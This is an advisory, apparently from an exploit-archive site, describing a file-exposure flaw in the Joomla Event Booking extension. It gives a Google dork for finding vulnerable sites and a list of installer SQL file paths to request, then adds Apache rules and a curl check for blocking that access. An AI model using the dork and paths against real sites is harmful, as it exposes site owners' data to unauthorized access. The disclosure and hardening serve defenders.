Joomla com_eventbooking Components Database Backup Arbitrary File Download Vulnerability

2018.11.29
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

#################################################################################################
# Exploit Title : Joomla com_eventbooking Components Database Backup Arbitrary File Download Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 29/11/2018
# Vendor Homepage : extensions.joomla.org/extension/event-booking/
# + joomdonation.com/joomla-extensions/events-booking-joomla-events-registration
# Tested On : Windows and Linux
# Category : WebApps
# Software Download Link :
# + github.com/Jasonudoo/platform/tree/master/components/com_eventbooking
# Software Price : $40
# Version Information : All Previous Versions and 3.8.3
# Exploit Risk : High
# Google Dork : inurl:''/index.php?option=com_eventbooking'' EB_INVALID_EVENT inurl:/index.php?option=com_eventbooking&Itemid=''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
# CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
# CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
# Admin Panel Login Path : /administrator/
# Exploit :
/administrator/components/com_eventbooking/sql/config.eventbooking.sql
/administrator/components/com_eventbooking/sql/createifnotexists.eventbooking.sql
/administrator/components/com_eventbooking/sql/deposit.eventbooking.sql
/administrator/components/com_eventbooking/sql/fields.eventbooking.sql
/administrator/components/com_eventbooking/sql/install.eventbooking.sql
/administrator/components/com_eventbooking/sql/invoices.eventbooking.sql
/administrator/components/com_eventbooking/sql/menus.eventbooking.sql
/administrator/components/com_eventbooking/sql/messages.eventbooking.sql
/administrator/components/com_eventbooking/sql/plugins.eventbooking.sql
/administrator/components/com_eventbooking/sql/themes.eventbooking.sql
/administrator/components/com_eventbooking/sql/uninstall.eventbooking.sql
#################################################################################################
# Example Vulnerable Sites =>
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
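The files listed above are installer SQL scripts that Joomla only needs on disk, never over HTTP. As an added hardening example (not part of the original advisory or the vendor's code), the Apache rules below deny direct web access to any .sql file; the .htaccess placement and the AllowOverride settings are assumptions about the host's configuration.

```apache
# Hardening example (not part of the original advisory): save as .htaccess in
# /administrator/components/com_eventbooking/sql/ to cover the paths above, or
# in the Joomla site root to cover every extension's installer SQL scripts.
# Assumes the vhost allows .htaccess overrides (AllowOverride AuthConfig on
# Apache 2.4, AllowOverride Limit on Apache 2.2); otherwise put the same
# FilesMatch block in the <Directory> section of the vhost config.
<IfModule mod_authz_core.c>
    # Apache 2.4 and later
    <FilesMatch "\.sql$">
        Require all denied
    </FilesMatch>
</IfModule>
<IfModule !mod_authz_core.c>
    # Apache 2.2
    <FilesMatch "\.sql$">
        Order allow,deny
        Deny from all
    </FilesMatch>
</IfModule>
```

After deploying, a request from your own client such as `curl -I https://<your-site>/administrator/components/com_eventbooking/sql/config.eventbooking.sql` should return 403 rather than 200; the same check confirms that a later extension update has not restored the exposure.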
Copyright 2018, cxsecurity.com